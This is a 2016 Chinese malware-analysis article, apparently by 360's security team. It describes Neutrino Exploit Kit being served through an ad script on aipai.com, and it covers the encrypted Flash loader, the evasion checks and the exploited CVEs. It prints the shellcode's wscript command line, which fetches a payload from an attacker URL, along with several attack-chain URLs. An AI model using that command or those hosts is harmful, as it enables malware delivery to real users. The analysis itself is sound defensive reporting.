欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

NeutrinoEK来袭:爱拍网遭敲诈者病毒挂马

来源:本站整理 作者:360安全卫士 时间:2016-07-15 TAG: 我要投稿

0x00 简介


EK(Exploit kits)主要是利用漏洞挂马的黑客工具包,目前流行的EK大多被用于传播敲诈者病毒。但以往国外的EK很少在国内出现,这一方面是由于这些EK的网址难以访问,另一方面也是国内用户为敲诈者病毒支付比特币赎金的难度较高,不容易产生“收益”。不过就在最近,360安全团队检测到在爱拍网(aipai.com)上出现国外攻击包挂马传播敲诈者病毒的情况,这就是著名的NeutrinoEK。

0x01 Web挂马过程


在访问爱拍网时,会经常通过hxxp://apas.aipai.com/www/delivery/ajs.php随机加载广告js脚本,而这个js就是一切的罪魁祸首。一旦返回的脚本是hxxp://if.eagleholic.com/decreased/satisfactory/header.js,就会加载NeutrinoEK的着陆页面。

pic1

图1 ajs.php随机加载js

可能是NeutrinoEK的自身安全防范机制,或者是网络原因,这个js脚本并不是每次都能打开,经常打开得到的是空内容或者404,但是偶尔一次获取内容成功,则就进入到了NeutrinoEK的攻击范围中。

pic2

图2 嵌入NeutrinoEK的iframe

获取的js脚本会自动在当前页面中嵌入一个iframe,加载NeutrinoEK的网址,这个网址基本都是一次性的,访问过后会很快发生变更,因此目前再次访问该页面,已经无法重现。

pic3

图3 NeutrinoEK着陆页

不同于其他EK攻击包,NeutrinoEK的页面非常简洁,仅仅是简单的加载了一个Flash,这个Flash功能非常强大,能够进行版本判定,检测一些自动化测试环境,针对不同的IE和Flash版本运行对应的漏洞利用代码。

0x02 Flash代码分析


这个得到的Flash只是一个加密外壳,真正的攻击代码Flash需要解密后才能看到,在反编译得到的代码中含有大量的垃圾代码,干扰分析。经过整理后,可以发现解密算法是RC4,解密密钥存储在一个binaryData结构中。随着后续代码分析的深入,我们可以发现NeutrinoEK所使用的所有加解密算法都是RC4,并且解密密钥都相对较短。

pic4

图4 下载得到的Flash

外壳Flash会将多个binaryData合并在一起,解密得到第二个Falsh文件,然后加载这个Flash,并且向其传递同样由BinaryData解密出来的运行配置信息。解密的Flash则会首先会加载js脚本,使用res协议进行一些安全软件和虚拟机探测操作。

pic5

图5 检测杀软和虚拟机

pic6

图6 加载不同漏洞脚本

然后根据系统IE/Flash的版本探测结果,释放加载不同的html/VBScript和Flash用于攻击。这些攻击代码仍然是通过RC4加密后存储在binaryData字段中,Html代码为了减少文件大小,都被压缩过。对于释放出来的Flash,则通过SharedObject的方法,将payload的相关参数传递进去。

经过进一步的解密分析,主要利用到的漏洞编号如下:

1.CVE-2016-0189

pic7

图7 CVE-2016-0189代码

2.CVE-2014-6332

pic8

图8 CVE-2014-6332代码

3.CVE-2015-8651

pic9

图9 CVE-2015-8651代码

4.CVE-2016-1019

pic10

图10 CVE-2016-1019代码

5.CVE-2016-4117

pic11

图11 CVE-2016-4117代码

0x03 释放载荷


加载的Flash通过同时利用上述漏洞,达到最终执行shellcode的目的,shellcode主要功能是释放了一个js文件,并调用wscript执行该文件,执行的命令行如下:

1
wscript.exe //B //E:JScript "C:\Users\pc\AppData\Local\Temp\Ogoss3df.dat" "nygqmtbwlr" "http://pompeijverblik.paydayloan.uk.com/jewel/health-39224276" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)"

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载